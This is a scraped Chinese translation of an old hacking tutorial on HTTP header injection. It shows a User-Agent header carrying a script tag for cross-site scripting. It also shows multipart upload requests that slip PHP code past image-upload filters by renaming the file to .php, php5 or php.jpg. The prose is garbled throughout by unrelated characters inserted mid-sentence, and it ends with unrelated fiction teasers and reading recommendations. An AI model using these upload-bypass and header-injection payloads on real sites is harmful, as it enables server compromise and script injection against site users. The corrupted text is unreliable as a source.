HTTP消息頭注入

這份論文只為教育目的郊愧。

我發(fā)現(xiàn)我的BLOGSPOT程序非常的糟糕,所有的提交都是非常的糟糕井佑,于是我決心做一個(gè)好的版本属铁。對(duì)不起,我的英語(yǔ)說(shuō)的不是很好,我會(huì)繼續(xù)努力的躬翁,OK焦蘑,讓我們開(kāi)始這篇簡(jiǎn)短的文章,你是怎么認(rèn)為看到一個(gè)上傳的頁(yè)面盒发,我認(rèn)為例嘱,也許每個(gè)人都會(huì)想這是一個(gè)非常不錯(cuò)的BUG∧ⅲ跨站上傳是一個(gè)不錯(cuò)的主意拼卵,你也可以把文件重命名為“File.php.jpg”。然而我們將要談?wù)摰目缯揪褪窃谙㈩^中蛮艰,存在這種漏洞的頁(yè)面是高風(fēng)險(xiǎn)的腋腮。

關(guān)于HTTP消息頭:http://en.wikipedia.org/wiki/List_of_HTTP_headers

你要知道我們可以修改HTTP頭應(yīng)答包,就像一個(gè)注射的例子(要理解這個(gè)或做一些測(cè)試印荔,你需要下載并安裝在FireFox Addon中搜索”Live HTTP Headers”)運(yùn)行這個(gè)Addon當(dāng)你輸入Google.com回車(chē)后,如例子你將看到一些應(yīng)答包數(shù)據(jù)低葫,如下:

Host: google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

你知道有多少站點(diǎn)會(huì)在這個(gè)頁(yè)面中打印你的IP和瀏覽器?很多!,你認(rèn)為這樣正解嗎仍律?你可以改變這個(gè)消息頭和制做一個(gè)測(cè)試用的XSS(Cross Site Scripting)嘿悬,許多的站點(diǎn)存在這種類(lèi)型的漏洞而造到攻擊,因?yàn)閃EB管理員毫不知道關(guān)于這類(lèi)的BUG;我記得不是很清楚水泉,但是Astalavista前幾個(gè)月也是這種類(lèi)型的攻擊漏洞—HTTP HEADER INJECTION∩普牵現(xiàn)在當(dāng)你拿著HTTP消息頭的應(yīng)答包打開(kāi)你的Addon Live http headers單擊上面的選項(xiàng)”replay”和修改瀏覽器/ user agent如下例:

Host: google.com

User-Agent:<script>alert(/XSS/)</script>

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

當(dāng)你再次單擊”replay”你會(huì)看到結(jié)果正是你http消息頭的注入結(jié)果窒盐,測(cè)試中發(fā)現(xiàn)85%的頁(yè)面都存在這樣的BUG,如果你要去一個(gè)WEB程序中你務(wù)必保持警覺(jué)钢拧。你知道怎么修改這個(gè)程序嗎蟹漓?只需要使用htmlspecialchars();函數(shù)。那是關(guān)于XSS的利用源内,但是我對(duì)跨站上傳的時(shí)候制做http header注入感興趣.

讓我們看這個(gè)HTTP頭的葡粒,消息包,是在我上傳一個(gè)”IMAGE”時(shí)的全部代碼:

Host: www.webiste.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://website.com

Content-Type: multipart/form-data; boundary=---------------------------23864205337548

Content-Length: 322

-----------------------------23864205337548

Content-Disposition: form-data; name="userfile"; filename="image.jpg"

Content-Type: image/jpeg


phpinfo();

?>

-----------------------------23864205337548

Content-Disposition: form-data; name="submit"

Subir imagen

-----------------------------23864205337548--

這是我在http消息頭中推測(cè)出的圖片應(yīng)答包。在這中間你可以看到PHP代碼膜钓,OK,讓我們嘗試一些不同的嗽交,我們可以去改變這個(gè)名稱(chēng)為圖片和其他的擴(kuò)展名如例子:.php(由于一些站點(diǎn)以經(jīng)把漏洞給補(bǔ)上了,不可以上傳PHP擴(kuò)展名颂斜,你可以去嘗試

php5,php4,php.jpg,php.png,etc);

Content-Disposition: form-data; name="userfile"; filename="image.php"

Content-Type: image/jpeg


phpinfo();

?>

-----------------------------23864205337548

Content-Disposition: form-data; name="submit"

Subir imagen

-----------------------------23864205337548—

當(dāng)我們發(fā)送replay后夫壁,讓我們看一下HTTP消息頭注入的返回結(jié)果;我們得到POST發(fā)送的錯(cuò)誤,內(nèi)容是過(guò)于長(zhǎng)沃疮。退出這個(gè)錯(cuò)誤提示盒让,再次點(diǎn)擊發(fā)送replay在外面:

Content-Length: 322

如果上傳漏洞存在,你將看到你所上傳代碼執(zhí)行后的頁(yè)面司蔬,當(dāng)你點(diǎn)擊這個(gè)連接就會(huì)看到你假圖片.我希望你們?cè)谶@篇論文里學(xué)到新的知識(shí)邑茄,致意。

Author : Psiczn

Website: www.psiczn.uni.cc

Contact: Psiczn@gmail.com

Note : If you are going to post this little paper in some site please put the source and the

author, this paper have copyright.

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末葱她,一起剝皮案震驚了整個(gè)濱河市撩扒,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌吨些,老刑警劉巖搓谆,帶你破解...
    沈念sama閱讀 212,599評(píng)論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異豪墅,居然都是意外死亡泉手,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,629評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門(mén)偶器,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)斩萌,“玉大人,你說(shuō)我怎么就攤上這事屏轰〖绽桑” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 158,084評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵霎苗,是天一觀(guān)的道長(zhǎng)姆吭。 經(jīng)常有香客問(wèn)我,道長(zhǎng)唁盏,這世上最難降的妖魔是什么内狸? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,708評(píng)論 1 284
  • 正文 為了忘掉前任检眯,我火速辦了婚禮,結(jié)果婚禮上昆淡,老公的妹妹穿的比我還像新娘锰瘸。我一直安慰自己,他們只是感情好昂灵,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,813評(píng)論 6 386
  • 文/花漫 我一把揭開(kāi)白布避凝。 她就那樣靜靜地躺著,像睡著了一般眨补。 火紅的嫁衣襯著肌膚如雪恕曲。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 50,021評(píng)論 1 291
  • 那天渤涌,我揣著相機(jī)與錄音,去河邊找鬼把还。 笑死实蓬,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的吊履。 我是一名探鬼主播安皱,決...
    沈念sama閱讀 39,120評(píng)論 3 410
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼艇炎!你這毒婦竟也來(lái)了酌伊?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 37,866評(píng)論 0 268
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤缀踪,失蹤者是張志新(化名)和其女友劉穎居砖,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體驴娃,經(jīng)...
    沈念sama閱讀 44,308評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡奏候,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,633評(píng)論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了唇敞。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片蔗草。...
    茶點(diǎn)故事閱讀 38,768評(píng)論 1 341
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖疆柔,靈堂內(nèi)的尸體忽然破棺而出咒精,到底是詐尸還是另有隱情,我是刑警寧澤旷档,帶...
    沈念sama閱讀 34,461評(píng)論 4 333
  • 正文 年R本政府宣布模叙,位于F島的核電站,受9級(jí)特大地震影響彬犯,放射性物質(zhì)發(fā)生泄漏向楼。R本人自食惡果不足惜查吊,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 40,094評(píng)論 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望湖蜕。 院中可真熱鬧逻卖,春花似錦、人聲如沸昭抒。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,850評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)灭返。三九已至盗迟,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間熙含,已是汗流浹背罚缕。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,082評(píng)論 1 267
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留怎静,地道東北人邮弹。 一個(gè)月前我還...
    沈念sama閱讀 46,571評(píng)論 2 362
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像蚓聘,于是被迫代替她去往敵國(guó)和親腌乡。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,666評(píng)論 2 350

推薦閱讀更多精彩內(nèi)容

  • 什么是HTTP Headers HTTP是“Hypertext Transfer Protocol”的所寫(xiě)夜牡,整個(gè)萬(wàn)...
    蘇文星閱讀 2,651評(píng)論 0 4
  • 請(qǐng)求類(lèi)型 三種最常見(jiàn)的請(qǐng)求類(lèi)型是:GET塘装,POST 和 HEAD GET:獲取一個(gè)文檔 大部分被傳輸?shù)綖g覽器的ht...
    拾穗丶閱讀 3,132評(píng)論 0 4
  • ¥開(kāi)啟¥ 【iAPP實(shí)現(xiàn)進(jìn)入界面執(zhí)行逐一顯】 〖2017-08-25 15:22:14〗 《//首先開(kāi)一個(gè)線(xiàn)程急迂,因...
    小菜c閱讀 6,375評(píng)論 0 17
  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn)氢哮,斷路器袋毙,智...
    卡卡羅2017閱讀 134,637評(píng)論 18 139
  • 2017年張桂萍分享連接真我天使指導(dǎo)靈奇跡感恩 -一、奇跡 1:我很開(kāi)心地連讀...
    富足開(kāi)心喜悅張桂萍閱讀 400評(píng)論 0 0